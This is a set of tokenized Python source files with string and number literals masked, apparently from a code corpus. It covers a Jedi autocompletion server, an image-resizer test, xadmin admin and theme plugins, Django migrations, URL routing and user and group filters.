<EOL> return self . _complete_call_assigments ( ) <EOL> def get_autocomplete ( self ) : <EOL> """<STR_LIT>""" <EOL> data = [ ] <EOL> try : <EOL> data . extend ( self . _parameters_for_completion ( ) ) <EOL> except : <EOL> logger . info ( "<STR_LIT>" ) <EOL> try : <EOL> data . extend ( self . _completion ( ) or [ ] ) <EOL> except : <EOL> logger . info ( "<STR_LIT>" ) <EOL> return data <EOL> def get_docstring ( self ) : <EOL> return self . _docstring ( ) <EOL> def get_signature ( self ) : <EOL> return self . _docstring ( signature = <NUM_LIT:1> ) <EOL> def _docstring ( self , signature = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> defs = self . script . goto_definitions ( ) <EOL> assert isinstance ( defs , list ) <EOL> if len ( defs ) > <NUM_LIT:0> : <EOL> if signature : <EOL> calltip_signature = defs [ <NUM_LIT:0> ] . docstring ( ) . split ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> return calltip_signature . replace ( '<STR_LIT:\n>' , '<STR_LIT:U+0020>' ) . replace ( '<STR_LIT>' , '<STR_LIT:=>' ) <EOL> else : <EOL> return defs [ <NUM_LIT:0> ] . docstring ( ) <EOL> def _parameters_for_completion ( self ) : <EOL> """<STR_LIT>""" <EOL> completions = [ ] <EOL> try : <EOL> in_call = self . script . call_signatures ( ) [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> in_call = None <EOL> parameters = get_function_parameters ( in_call ) <EOL> for parameter in parameters : <EOL> try : <EOL> name , value = parameter <EOL> except ValueError : <EOL> name = parameter [ <NUM_LIT:0> ] <EOL> value = None <EOL> if value is None : <EOL> completions . append ( ( name , '<STR_LIT>' % name ) ) <EOL> else : <EOL> completions . append ( ( name + '<STR_LIT:\t>' + value , <EOL> '<STR_LIT>' % ( name , value ) ) ) <EOL> return completions <EOL> def _completion ( self ) : <EOL> """<STR_LIT>""" <EOL> completions = self . script . completions ( ) <EOL> return [ format_completion ( complete ) for complete in completions ] <EOL> def _goto ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> definitions = self . script . goto_assignments ( ) <EOL> if all ( d . type == '<STR_LIT>' for d in definitions ) : <EOL> definitions = self . script . goto_definitions ( ) <EOL> except NotFoundError : <EOL> return <EOL> else : <EOL> return [ ( i . module_path , i . line , i . column + <NUM_LIT:1> ) <EOL> for i in definitions if not i . in_builtin_module ( ) ] <EOL> def _usages ( self ) : <EOL> """<STR_LIT>""" <EOL> usages = self . script . usages ( ) <EOL> return [ ( i . module_path , i . line , i . column + <NUM_LIT:1> ) <EOL> for i in usages if not i . in_builtin_module ( ) ] <EOL> def _complete_call_assigments ( self ) : <EOL> """<STR_LIT>""" <EOL> completions = [ ] <EOL> complete_all = auto_complete_function_params == '<STR_LIT:all>' <EOL> try : <EOL> call_definition = self . script . call_signatures ( ) [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> call_definition = None <EOL> parameters = get_function_parameters ( call_definition ) <EOL> for index , parameter in enumerate ( parameters ) : <EOL> try : <EOL> name , value = parameter <EOL> except ValueError : <EOL> name = parameter [ <NUM_LIT:0> ] <EOL> value = None <EOL> if value is None : <EOL> completions . append ( '<STR_LIT>' % ( index + <NUM_LIT:1> , name ) ) <EOL> elif complete_all : <EOL> completions . append ( '<STR_LIT>' % ( name , index + <NUM_LIT:1> , value ) ) <EOL> return "<STR_LIT:U+002CU+0020>" . join ( completions ) <EOL> def process_line ( line ) : <EOL> data = json . loads ( line . strip ( ) ) <EOL> action_type = data [ '<STR_LIT:type>' ] <EOL> script = JediFacade ( <EOL> source = data [ '<STR_LIT:source>' ] , <EOL> line = data [ '<STR_LIT>' ] , <EOL> offset = data [ '<STR_LIT>' ] , <EOL> filename = data . get ( '<STR_LIT:filename>' , '<STR_LIT>' ) <EOL> ) <EOL> out_data = { <EOL> '<STR_LIT>' : data . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT:type>' : action_type , <EOL> action_type : script . get ( action_type ) <EOL> } <EOL> write ( out_data ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> parser = OptionParser ( ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> default = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> default = [ ] , <EOL> action = "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> default = '<STR_LIT:all>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> options , args = parser . parse_args ( ) <EOL> is_funcargs_complete_enabled = bool ( options . function_params ) <EOL> auto_complete_function_params = options . function_params <EOL> logger . info ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> options . extra_folders , <EOL> options . function_params , <EOL> ) <EOL> for extra_folder in options . extra_folders : <EOL> if extra_folder not in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , extra_folder ) <EOL> for line in iter ( sys . stdin . readline , '<STR_LIT>' ) : <EOL> if line : <EOL> try : <EOL> process_line ( line ) <EOL> except Exception : <EOL> logger . exception ( '<STR_LIT>' ) </s>
<s> from pipeline . resizer import Resizer <EOL> import unittest <EOL> import hashlib <EOL> import os <EOL> import engine <EOL> class TestResizer ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . test_in = os . path . abspath ( <EOL> '<STR_LIT>' <EOL> ) <EOL> self . test_reference_crop = os . path . abspath ( <EOL> '<STR_LIT>' <EOL> ) <EOL> self . test_reference_resize = os . path . abspath ( <EOL> '<STR_LIT>' <EOL> ) <EOL> self . test_reference_resizecomp = os . path . abspath ( <EOL> '<STR_LIT>' <EOL> ) <EOL> def _load_image_as_str ( self , file ) : <EOL> return open ( file ) . read ( ) <EOL> def test_resize_crop ( self ) : <EOL> image = self . _load_image_as_str ( self . test_in ) <EOL> reference = self . _load_image_as_str ( self . test_reference_crop ) <EOL> reference_hash = hashlib . md5 ( reference ) . hexdigest ( ) <EOL> res = Resizer ( engine . BobRossEngine ( ) ) <EOL> out = res . _resize_using_pg ( image , <NUM_LIT:200> , <NUM_LIT:200> , '<STR_LIT>' ) <EOL> out_file = out [ <NUM_LIT:0> ] <EOL> out_file_hash = hashlib . md5 ( out_file ) . hexdigest ( ) <EOL> self . assertEqual ( out_file_hash , reference_hash ) <EOL> self . assertEqual ( out [ <NUM_LIT:1> ] , <NUM_LIT:200> ) <EOL> self . assertEqual ( out [ <NUM_LIT:2> ] , <NUM_LIT:200> ) <EOL> def test_resize_resize ( self ) : <EOL> image = self . _load_image_as_str ( self . test_in ) <EOL> reference = self . _load_image_as_str ( self . test_reference_resize ) <EOL> reference_hash = hashlib . md5 ( reference ) . hexdigest ( ) <EOL> res = Resizer ( engine . BobRossEngine ( ) ) <EOL> out = res . _resize_using_pg ( image , <NUM_LIT:200> , <NUM_LIT:200> , '<STR_LIT>' ) <EOL> out_file = out [ <NUM_LIT:0> ] <EOL> out_file_hash = hashlib . md5 ( out_file ) . hexdigest ( ) <EOL> self . assertEqual ( out_file_hash , reference_hash ) <EOL> self . assertEqual ( out [ <NUM_LIT:1> ] , <NUM_LIT:200> ) <EOL> self . assertEqual ( out [ <NUM_LIT:2> ] , <NUM_LIT> ) <EOL> def test_resize_resizecomp ( self ) : <EOL> image = self . _load_image_as_str ( self . test_in ) <EOL> reference = self . _load_image_as_str ( self . test_reference_resizecomp ) <EOL> reference_hash = hashlib . md5 ( reference ) . hexdigest ( ) <EOL> res = Resizer ( engine . BobRossEngine ( ) ) <EOL> out = res . _resize_using_pg ( image , <NUM_LIT:200> , <NUM_LIT:200> , '<STR_LIT>' ) <EOL> out_file = out [ <NUM_LIT:0> ] <EOL> out_file_hash = hashlib . md5 ( out_file ) . hexdigest ( ) <EOL> self . assertEqual ( out_file_hash , reference_hash ) <EOL> self . assertEqual ( out [ <NUM_LIT:1> ] , <NUM_LIT:200> ) <EOL> self . assertEqual ( out [ <NUM_LIT:2> ] , <NUM_LIT:200> ) </s>
<s> import xadmin <EOL> from xadmin import views <EOL> from models import IDC , Host , MaintainLog , HostGroup , AccessRecord <EOL> from xadmin . layout import Main , TabHolder , Tab , Fieldset , Row , Col , AppendedText , Side <EOL> from xadmin . plugins . inline import Inline <EOL> from xadmin . plugins . batch import BatchChangeAction <EOL> class MainDashboard ( object ) : <EOL> widgets = [ <EOL> [ <EOL> { "<STR_LIT:type>" : "<STR_LIT:html>" , "<STR_LIT:title>" : "<STR_LIT>" , "<STR_LIT:content>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:p>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' } } , <EOL> { "<STR_LIT:type>" : "<STR_LIT:list>" , "<STR_LIT>" : "<STR_LIT>" , '<STR_LIT>' : { <EOL> '<STR_LIT:o>' : '<STR_LIT>' } } , <EOL> ] , <EOL> [ <EOL> { "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT:title>" : "<STR_LIT>" , "<STR_LIT>" : [ { '<STR_LIT>' : Host } , { '<STR_LIT>' : IDC } , { '<STR_LIT:title>' : "<STR_LIT>" , '<STR_LIT:url>' : "<STR_LIT>" } ] } , <EOL> { "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT>" : MaintainLog } , <EOL> ] <EOL> ] <EOL> xadmin . sites . site . register ( views . website . IndexView , MainDashboard ) <EOL> class BaseSetting ( object ) : <EOL> enable_themes = True <EOL> use_bootswatch = True <EOL> xadmin . sites . site . register ( views . BaseAdminView , BaseSetting ) <EOL> class GlobalSetting ( object ) : <EOL> global_search_models = [ Host , IDC ] <EOL> global_models_icon = { <EOL> Host : '<STR_LIT>' , IDC : '<STR_LIT>' <EOL> } <EOL> menu_style = '<STR_LIT:default>' <EOL> xadmin . sites . site . register ( views . CommAdminView , GlobalSetting ) <EOL> class MaintainInline ( object ) : <EOL> model = MaintainLog <EOL> extra = <NUM_LIT:1> <EOL> style = '<STR_LIT>' <EOL> class IDCAdmin ( object ) : <EOL> list_display = ( '<STR_LIT:name>' , '<STR_LIT:description>' , '<STR_LIT>' ) <EOL> list_display_links = ( '<STR_LIT:name>' , ) <EOL> wizard_form_list = [ <EOL> ( '<STR_LIT>' , ( '<STR_LIT:name>' , '<STR_LIT:description>' ) ) , <EOL> ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:address>' ) ) , <EOL> ( '<STR_LIT>' , ( '<STR_LIT>' , ) ) <EOL> ] <EOL> search_fields = [ '<STR_LIT:name>' ] <EOL> relfield_style = '<STR_LIT>' <EOL> reversion_enable = True <EOL> actions = [ BatchChangeAction , ] <EOL> batch_fields = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> class HostAdmin ( object ) : <EOL> def open_web ( self , instance ) : <EOL> return "<STR_LIT>" % instance . ip <EOL> open_web . short_description = "<STR_LIT>" <EOL> open_web . allow_tags = True <EOL> open_web . is_column = True <EOL> list_display = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT:description>' ) <EOL> list_display_links = ( '<STR_LIT:name>' , ) <EOL> raw_id_fields = ( '<STR_LIT>' , ) <EOL> style_fields = { '<STR_LIT>' : "<STR_LIT>" } <EOL> search_fields = [ '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT:description>' ] <EOL> list_filter = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ( '<STR_LIT>' , xadmin . filters . MultiSelectFieldListFilter ) ] <EOL> list_quick_filter = [ '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:10> } ] <EOL> list_bookmarks = [ { '<STR_LIT:title>' : "<STR_LIT>" , '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:2> } , '<STR_LIT>' : ( '<STR_LIT>' , ) , '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) } ] <EOL> show_detail_fields = ( '<STR_LIT>' , ) <EOL> list_editable = ( <EOL> '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:description>' ) <EOL> save_as = True <EOL> aggregate_fields = { "<STR_LIT>" : "<STR_LIT>" } <EOL> grid_layouts = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> form_layout = ( <EOL> Main ( <EOL> TabHolder ( <EOL> Tab ( '<STR_LIT>' , <EOL> Fieldset ( '<STR_LIT>' , <EOL> '<STR_LIT:name>' , '<STR_LIT>' , <EOL> description = "<STR_LIT>" <EOL> ) , <EOL> Inline ( MaintainLog ) , <EOL> ) , <EOL> Tab ( '<STR_LIT>' , <EOL> Fieldset ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> Row ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> Row ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> Row ( AppendedText ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) , AppendedText ( '<STR_LIT>' , "<STR_LIT>" ) ) , <EOL> '<STR_LIT>' <EOL> ) , <EOL> ) , <EOL> ) , <EOL> ) , <EOL> Side ( <EOL> Fieldset ( '<STR_LIT>' , <EOL> '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) , <EOL> ) <EOL> ) <EOL> inlines = [ MaintainInline ] <EOL> reversion_enable = True <EOL> data_charts = { <EOL> "<STR_LIT>" : { '<STR_LIT:title>' : u"<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : ( "<STR_LIT>" , ) , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> , '<STR_LIT>' : True } } , <EOL> "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT:count>" , "<STR_LIT>" : "<STR_LIT>" } , <EOL> } , <EOL> } , <EOL> } <EOL> class HostGroupAdmin ( object ) : <EOL> list_display = ( '<STR_LIT:name>' , '<STR_LIT:description>' ) <EOL> list_display_links = ( '<STR_LIT:name>' , ) <EOL> search_fields = [ '<STR_LIT:name>' ] <EOL> style_fields = { '<STR_LIT>' : '<STR_LIT>' } <EOL> class MaintainLogAdmin ( object ) : <EOL> list_display = ( <EOL> '<STR_LIT:host>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:time>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> list_display_links = ( '<STR_LIT:host>' , ) <EOL> list_filter = [ '<STR_LIT:host>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:time>' , '<STR_LIT>' ] <EOL> search_fields = [ '<STR_LIT>' ] <EOL> form_layout = ( <EOL> Col ( "<STR_LIT>" , <EOL> Fieldset ( '<STR_LIT>' , <EOL> '<STR_LIT:time>' , '<STR_LIT>' , <EOL> css_class = '<STR_LIT>' <EOL> ) , <EOL> span = <NUM_LIT:9> , horizontal = True <EOL> ) , <EOL> Col ( "<STR_LIT>" , <EOL> Fieldset ( '<STR_LIT>' , <EOL> '<STR_LIT:host>' , '<STR_LIT>' <EOL> ) , <EOL> Fieldset ( '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ) , <EOL> span = <NUM_LIT:3> <EOL> ) <EOL> ) <EOL> reversion_enable = True <EOL> class AccessRecordAdmin ( object ) : <EOL> def avg_count ( self , instance ) : <EOL> return int ( instance . view_count / instance . user_count ) <EOL> avg_count . short_description = "<STR_LIT>" <EOL> avg_count . allow_tags = True <EOL> avg_count . is_column = True <EOL> list_display = ( '<STR_LIT:date>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> list_display_links = ( '<STR_LIT:date>' , ) <EOL> list_filter = [ '<STR_LIT:date>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> actions = None <EOL> aggregate_fields = { "<STR_LIT>" : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" } <EOL> refresh_times = ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:10> ) <EOL> data_charts = { <EOL> "<STR_LIT>" : { '<STR_LIT:title>' : u"<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:date>" , "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" ) , "<STR_LIT>" : ( '<STR_LIT:date>' , ) } , <EOL> "<STR_LIT>" : { '<STR_LIT:title>' : u"<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:date>" , "<STR_LIT>" : ( '<STR_LIT>' , ) , "<STR_LIT>" : ( '<STR_LIT:date>' , ) } , <EOL> "<STR_LIT>" : { '<STR_LIT:title>' : u"<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : ( "<STR_LIT>" , ) , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> , '<STR_LIT>' : True } } , <EOL> "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } , <EOL> } , <EOL> } , <EOL> } <EOL> def _chart_month ( self , obj ) : <EOL> return obj . date . strftime ( "<STR_LIT>" ) <EOL> xadmin . sites . site . register ( Host , HostAdmin ) <EOL> xadmin . sites . site . register ( HostGroup , HostGroupAdmin ) <EOL> xadmin . sites . site . register ( MaintainLog , MaintainLogAdmin ) <EOL> xadmin . sites . site . register ( IDC , IDCAdmin ) <EOL> xadmin . sites . site . register ( AccessRecord , AccessRecordAdmin ) </s>
<s> PLUGINS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def register_builtin_plugins ( site ) : <EOL> from importlib import import_module <EOL> from django . conf import settings <EOL> exclude_plugins = getattr ( settings , '<STR_LIT>' , [ ] ) <EOL> [ import_module ( '<STR_LIT>' % plugin ) for plugin in PLUGINS if plugin not in exclude_plugins ] </s>
<s> import urllib , httplib2 <EOL> from django . template import loader <EOL> from django . core . cache import cache <EOL> from django . utils . translation import ugettext as _ <EOL> from xadmin . sites import site <EOL> from xadmin . models import UserSettings <EOL> from xadmin . views import BaseAdminPlugin , BaseAdminView <EOL> from xadmin . util import static , json <EOL> THEME_CACHE_KEY = '<STR_LIT>' <EOL> class ThemePlugin ( BaseAdminPlugin ) : <EOL> enable_themes = False <EOL> user_themes = None <EOL> use_bootswatch = False <EOL> default_theme = static ( '<STR_LIT>' ) <EOL> bootstrap2_theme = static ( '<STR_LIT>' ) <EOL> def init_request ( self , * args , ** kwargs ) : <EOL> return self . enable_themes <EOL> def _get_theme ( self ) : <EOL> if self . user : <EOL> try : <EOL> return UserSettings . objects . get ( user = self . user , key = "<STR_LIT>" ) . value <EOL> except Exception : <EOL> pass <EOL> if '<STR_LIT>' in self . request . COOKIES : <EOL> return urllib . unquote ( self . request . COOKIES [ '<STR_LIT>' ] ) <EOL> return self . default_theme <EOL> def get_context ( self , context ) : <EOL> context [ '<STR_LIT>' ] = self . _get_theme ( ) <EOL> return context <EOL> def get_media ( self , media ) : <EOL> return media + self . vendor ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def block_top_navmenu ( self , context , nodes ) : <EOL> themes = [ { '<STR_LIT:name>' : _ ( u"<STR_LIT>" ) , '<STR_LIT:description>' : _ ( <EOL> u"<STR_LIT>" ) , '<STR_LIT>' : self . default_theme } , <EOL> { '<STR_LIT:name>' : _ ( u"<STR_LIT>" ) , '<STR_LIT:description>' : _ ( u"<STR_LIT>" ) , <EOL> '<STR_LIT>' : self . bootstrap2_theme } ] <EOL> select_css = context . get ( '<STR_LIT>' , self . default_theme ) <EOL> if self . user_themes : <EOL> themes . extend ( self . user_themes ) <EOL> if self . use_bootswatch : <EOL> ex_themes = cache . get ( THEME_CACHE_KEY ) <EOL> if ex_themes : <EOL> themes . extend ( json . loads ( ex_themes ) ) <EOL> else : <EOL> ex_themes = [ ] <EOL> try : <EOL> h = httplib2 . Http ( ) <EOL> resp , content = h . request ( "<STR_LIT>" , '<STR_LIT:GET>' , "<STR_LIT>" , headers = { "<STR_LIT>" : "<STR_LIT:application/json>" , "<STR_LIT>" : self . request . META [ '<STR_LIT>' ] } ) <EOL> watch_themes = json . loads ( content ) [ '<STR_LIT>' ] <EOL> ex_themes . extend ( [ <EOL> { '<STR_LIT:name>' : t [ '<STR_LIT:name>' ] , '<STR_LIT:description>' : t [ '<STR_LIT:description>' ] , <EOL> '<STR_LIT>' : t [ '<STR_LIT>' ] , '<STR_LIT>' : t [ '<STR_LIT>' ] } <EOL> for t in watch_themes ] ) <EOL> except Exception , e : <EOL> print e <EOL> cache . set ( THEME_CACHE_KEY , json . dumps ( ex_themes ) , <NUM_LIT> * <NUM_LIT> ) <EOL> themes . extend ( ex_themes ) <EOL> nodes . append ( loader . render_to_string ( '<STR_LIT>' , { '<STR_LIT>' : themes , '<STR_LIT>' : select_css } ) ) <EOL> site . register_plugin ( ThemePlugin , BaseAdminView ) </s>
<s> import urllib <EOL> import io <EOL> from PIL import Image <EOL> from StringIO import StringIO <EOL> def get_image_size ( url ) : <EOL> try : <EOL> if url . startswith ( '<STR_LIT:http>' ) : <EOL> fd = urllib . urlopen ( url ) <EOL> url = io . BytesIO ( fd . read ( ) ) <EOL> im = Image . open ( url ) <EOL> return im . size <EOL> except Exception , e : <EOL> return None </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> import django . utils . timezone <EOL> import django . core . validators <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT:password>' , models . CharField ( max_length = <NUM_LIT> , verbose_name = '<STR_LIT:password>' ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:username>' , models . CharField ( help_text = '<STR_LIT>' , unique = True , max_length = <NUM_LIT:30> , verbose_name = '<STR_LIT:username>' , validators = [ django . core . validators . RegexValidator ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ] ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:30> , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:30> , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT:email>' , models . EmailField ( max_length = <NUM_LIT> , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = True , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . URLField ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . ManyToManyField ( related_query_name = '<STR_LIT:user>' , related_name = '<STR_LIT>' , to = '<STR_LIT>' , blank = True , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . ManyToManyField ( related_query_name = '<STR_LIT:user>' , related_name = '<STR_LIT>' , to = '<STR_LIT>' , blank = True , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT:user>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> ] </s>
<s> import warnings <EOL> from django . conf import settings <EOL> from django . conf . urls import patterns <EOL> from django . utils import six <EOL> from . urlresolvers import SolidLocaleRegexURLResolver <EOL> def solid_i18n_patterns ( prefix , * args ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( prefix , six . string_types ) : <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> PendingDeprecationWarning , stacklevel = <NUM_LIT:2> <EOL> ) <EOL> pattern_list = patterns ( prefix , * args ) <EOL> else : <EOL> pattern_list = [ prefix ] + list ( args ) <EOL> if not settings . USE_I18N : <EOL> return pattern_list <EOL> return [ SolidLocaleRegexURLResolver ( pattern_list ) ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . RemoveField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> migrations . RemoveField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> migrations . DeleteModel ( <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> ] </s>
<s> from django . conf . urls import include , url <EOL> from rest_framework import routers <EOL> from . import api <EOL> model_router = routers . SimpleRouter ( ) <EOL> model_router . register ( r'<STR_LIT>' , <EOL> api . FormulaModelUserPermissionsViewSet , <EOL> '<STR_LIT>' ) <EOL> model_router . register ( r'<STR_LIT>' , <EOL> api . FormulaModelGroupPermissionsViewSet , <EOL> '<STR_LIT>' ) <EOL> object_router = routers . SimpleRouter ( ) <EOL> object_router . register ( r'<STR_LIT>' , <EOL> api . FormulaObjectUserPermissionsViewSet , <EOL> '<STR_LIT>' ) <EOL> object_router . register ( r'<STR_LIT>' , <EOL> api . FormulaObjectGroupPermissionsViewSet , <EOL> '<STR_LIT>' ) <EOL> urlpatterns = ( <EOL> url ( r'<STR_LIT>' , <EOL> api . FormulaListAPIView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> include ( model_router . urls ) ) , <EOL> url ( r'<STR_LIT>' , <EOL> api . FormulaDetailAPIView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> api . FormulaPropertiesAPIView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> api . FormulaComponentListAPIView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> api . FormulaValidVersionListAPIView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> api . FormulaActionAPIView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> include ( object_router . urls ) ) , <EOL> ) </s>
<s> import django_filters <EOL> from django . contrib . auth import get_user_model <EOL> from django . contrib . auth . models import Group <EOL> from stackdio . core . filters import OrFieldsFilter <EOL> class UserFilter ( django_filters . FilterSet ) : <EOL> username = django_filters . CharFilter ( lookup_type = '<STR_LIT>' ) <EOL> first_name = django_filters . CharFilter ( lookup_type = '<STR_LIT>' ) <EOL> last_name = django_filters . CharFilter ( lookup_type = '<STR_LIT>' ) <EOL> q = OrFieldsFilter ( field_names = ( '<STR_LIT:username>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:email>' ) , <EOL> lookup_type = '<STR_LIT>' ) <EOL> class Meta : <EOL> model = get_user_model ( ) <EOL> fields = ( <EOL> '<STR_LIT:username>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:q>' , <EOL> ) <EOL> class GroupFilter ( django_filters . FilterSet ) : <EOL> name = django_filters . CharFilter ( lookup_type = '<STR_LIT>' ) <EOL> q = OrFieldsFilter ( field_names = ( '<STR_LIT:name>' , ) , lookup_type = '<STR_LIT>' ) <EOL> class Meta : <EOL> model = Group <EOL> fields = ( <EOL> '<STR_LIT:name>' , <EOL> '<STR_LIT:q>' , <EOL> ) </s>
